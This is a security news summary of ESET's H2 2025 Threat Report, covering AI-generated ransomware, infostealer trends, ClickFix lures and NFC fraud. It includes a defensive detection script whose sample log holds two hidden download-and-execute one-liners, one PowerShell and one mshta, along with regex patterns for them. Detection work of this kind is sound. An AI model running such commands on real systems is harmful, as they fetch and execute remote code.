ESET H2 2025 Threat Report: First AI-Driven Ransomware PromptLock Discovered, Lumma Stealer Collapses
ESET's H2 2025 Threat Report reveals the first known AI-driven ransomware, PromptLock, and a 40% projected rise in ransomware victims, while Lumma Stealer detections plummet 86% after global disruption.

ESET Research has published its H2 2025 Threat Report, offering a sweeping view of the evolving threat landscape. The report highlights the discovery of PromptLock, the first known AI-driven ransomware capable of generating malicious scripts on the fly. While artificial intelligence has primarily been used for crafting convincing phishing and scam content, PromptLock signals a new era where AI powers malware directly.
Lumma Stealer, once a dominant infostealer, saw its detections fall by 86% in H2 2025 compared to the first half of the year. After the global disruption of its infrastructure in May, the malware briefly resurfaced twice but has not recovered its former reach. One of its significant distribution vectors, the HTML/FakeCaptcha trojan used in ClickFix attacks (fake CAPTCHA pages that talk the victim into pasting an attacker-supplied command into the Windows Run dialog), nearly vanished from ESET telemetry.
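The ClickFix vector named above leaves a recognisable trace in process telemetry: the pasted command runs as a child of explorer.exe (the Run dialog) and is almost always a download-and-execute one-liner for PowerShell, mshta or cmd. The following detection logic is an added example written for this page, not code from ESET or from the report; the log format is a constructed, simplified tab-separated process-creation record (parent image, image, command line), not real Sysmon or EDR output, and the IP addresses are from the documentation range.

```python
"""Flag ClickFix-style Run-dialog executions in process-creation telemetry.

Added example, not ESET's code. Assumes a constructed log format:
one event per line, fields separated by tabs:
    <ParentImage>\t<Image>\t<CommandLine>
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Interpreters that ClickFix lures typically tell the victim to launch via Win+R.
RUN_DIALOG_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe"}

# Each pattern is one indicator of a download-and-execute one-liner.
INDICATORS = [
    re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b", re.I),
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"https?://", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
]

# Constructed sample telemetry: two ClickFix-like events, three benign ones.
SAMPLE_LOG = """\
C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell -w hidden -c "iwr http://198.51.100.7/v.ps1 | iex"
C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta https://198.51.100.7/verify
C:\\Windows\\explorer.exe\tC:\\Program Files\\Notepad++\\notepad++.exe\tnotepad++ notes.txt
C:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell -File build.ps1
C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell Get-ChildItem
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text: str) -> list[ProcessEvent]:
    """Parse the constructed tab-separated format into events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmd = line.split("\t", 2)
        events.append(ProcessEvent(parent, image, cmd))
    return events


def indicator_score(command_line: str) -> int:
    """Number of distinct download-and-execute indicators in a command line."""
    return sum(1 for pattern in INDICATORS if pattern.search(command_line))


def is_clickfix_candidate(event: ProcessEvent, threshold: int = 2) -> bool:
    """True when an interpreter spawned by explorer.exe (the Run dialog)
    carries at least `threshold` indicators. Requiring two cuts noise from
    a lone URL or a lone 'curl' in an otherwise ordinary command."""
    return (
        basename(event.parent_image) == "explorer.exe"
        and basename(event.image) in RUN_DIALOG_INTERPRETERS
        and indicator_score(event.command_line) >= threshold
    )


def detect_clickfix(log_text: str) -> list[ProcessEvent]:
    """Return the events in `log_text` that look like ClickFix executions."""
    return [ev for ev in parse_log(log_text) if is_clickfix_candidate(ev)]


if __name__ == "__main__":
    for ev in detect_clickfix(SAMPLE_LOG):
        print(f"[ClickFix?] score={indicator_score(ev.command_line)} {ev.command_line}")
```

On the sample, the PowerShell download cradle scores 4 and the mshta URL launch scores 2; the three benign events (a non-interpreter child, an interpreter whose parent is cmd.exe, and an interpreter with no indicators) are not flagged. Expect false positives from administrators who legitimately paste installer one-liners into the Run dialog, so treat a hit as a triage lead rather than an automatic block, and corroborate it with the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which retains the last commands entered into the Run dialog.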
In contrast, CloudEyE (also known as GuLoader) surged nearly thirtyfold in ESET telemetry. Distributed via malicious email campaigns, this malware-as-a-service downloader and cryptor is used to deploy other malware, including ransomware and infostealers like Rescoms, Formbook, and Agent Tesla.
Ransomware victim numbers have already surpassed 2024 totals well before year's end, with ESET projecting a 40% year-over-year increase. Akira and Qilin now dominate the ransomware-as-a-service market, while the low-profile newcomer Warlock introduced novel evasion techniques. EDR killers, tooling that disables or terminates endpoint security agents before the ransomware payload runs, continue to proliferate, a sign that endpoint detection and response tools remain a significant obstacle for ransomware operators. H2 2025 also brought an unpleasant flashback to the Petya/NotPetya ransomware when ESET researchers uncovered HybridPetya, a new derivative capable of compromising modern UEFI-based systems.
On the Android platform, NFC threats grew 87% in ESET telemetry. NGate, a pioneer among NFC threats first described by ESET in 2024, received an upgrade with contact-stealing capabilities, likely laying the groundwork for future attacks. RatOn, entirely new malware on the NFC fraud scene, brought a rare fusion of RAT capabilities and NFC relay attacks, showing cybercriminals' determination to pursue new attack avenues.
Fraudsters behind the Nomani investment scams have also refined their techniques, using higher-quality deepfakes, AI-generated phishing sites, and increasingly short-lived ad campaigns to avoid detection. ESET telemetry shows Nomani scam detections grew 62% year-over-year, though the trend declined slightly in H2 2025.
The full report is available on ESET's WeLiveSecurity blog.